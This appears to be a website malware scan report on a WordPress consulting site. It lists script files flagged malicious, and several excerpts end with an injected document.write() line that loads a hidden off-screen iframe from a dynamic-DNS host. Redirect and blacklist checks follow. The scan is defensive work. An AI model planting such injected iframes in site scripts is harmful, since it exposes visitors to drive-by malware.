Scanned pages/files
Request | Server response | Status |
http://brianwhiteconsulting.com/ | 200 OK Content-Length: 15894 Content-Type: text/html | clean |
http://brianwhiteconsulting.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 95039 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows the start of the file, cut off mid-token, followed by what appears to be the injected statement: a document.write() call that adds a 70x70 iframe positioned off-screen (left:-550px) and loaded from a third-party host. The same statement ends several of the other excerpts below. Excerpt: (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createE ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.cycle.all.min.js?ver=3.4 | 200 OK Content-Length: 28058 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){var ver="2.65";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length==0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero ele ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.easing.1.3.js | 200 OK Content-Length: 8275 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.fancybox-1.2.6.pack.js | 200 OK Content-Length: 9700 Content-Type: text/javascript | malicious |
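Malicious code - confirmed by antiviruses (see below). The visible part is a p,a,c,k,e,r-packed script wrapped in eval(), which is consistent with the ".pack.js" file name and is not by itself an indicator of compromise. The excerpt is cut off before the end of the file, so the code that triggered the detection is not visible here. Excerpt: ;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(p($){$.q.1Q=p(){J O.2n(p(){n b=$(O).u(\'2o\');8(b.1d(/^3i\\(["\']?(.*\\.2p)["\']?\\)$/i)){b=3j.$1;$(O).u({\'2o\':\'3k\',\'1e\':"3l:3m.3n.3o(3p=D, 3q="+($(O).u(\'3r\' Antivirus reports: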
| ||
http://brianwhiteconsulting.com/wp-includes/js/jquery/jquery.form.js?ver=2.73 | 200 OK Content-Length: 11294 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The visible part reads as ordinary form-plugin code. The excerpt is cut off before the end of the file, so the code that triggered the detection is presumably past the cut and is not visible here. Excerpt: (function(b){b.fn.ajaxSubmit=function(t){if(!this.length){a("ajaxSubmit: skipping submit process - no element selected");return this}if(typeof t=="function"){t={success:t}}var h=this.attr("action");var d=(typeof h==="string")?b.trim(h):"";if(d){d=(d.match(/^([^#]+)/)||[])[1]}d=d||window.location.href||"";t=b.extend(true,{url:d,success:b.ajaxSettings.success,type:this[0].getAttribute("method")||"GET",iframeSrc:/^https/i.test(window.location.href||"")?"javascript:false":"about:blank"},t);var u={}; Antivirus reports:
| ||
http://brianwhiteconsulting.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.2 | 200 OK Content-Length: 4772 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() {
try { jQuery('div.wpcf7 > form').ajaxForm({ beforeSubmit: wpcf7BeforeSubmit, dataType: 'json', success: wpcf7ProcessJson }); } catch (e) { } try { jQuery('div.wpcf7 > form').each(function(i, n) { wpcf7ToggleSubmit(jQuery(n)); }); } catch (e) { } try { if (_wpcf7.cached) { jQuery('div.wpcf7 > form').each(function(i, n) { jQuery('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked'); jQuery('span.wpcf7-not-valid-tip').remove(); jQuery('img.ajax-loader').css({ visibility: 'hidden' }); };document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://brianwhiteconsulting.com/test404page.js | 404 Not Found Content-Length: 15860 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Apr 2014 16:20:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://brianwhiteconsulting.com/xmlrpc.php
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Apr 2014 16:20:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://brianwhiteconsulting.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Referer: http://www.google.com/search?q=brianwhiteconsulting.com
Result:
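The result is similar to the first query. No suspicious redirects were found. As shown, this check compares the server's response with and without a search-engine Referer, so it says nothing about the client-side iframe injection flagged in the scripts above.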
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Referer: http://www.google.com/search?q=brianwhiteconsulting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brianwhiteconsulting.com
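Result: This site is not currently listed as suspicious. Blacklist listings can lag behind an infection, so this result does not override the malicious script findings above.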
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brianwhiteconsulting.com/
Result: brianwhiteconsulting.com is not infected or malware details are not published yet.
Result: brianwhiteconsulting.com is not infected or malware details are not published yet.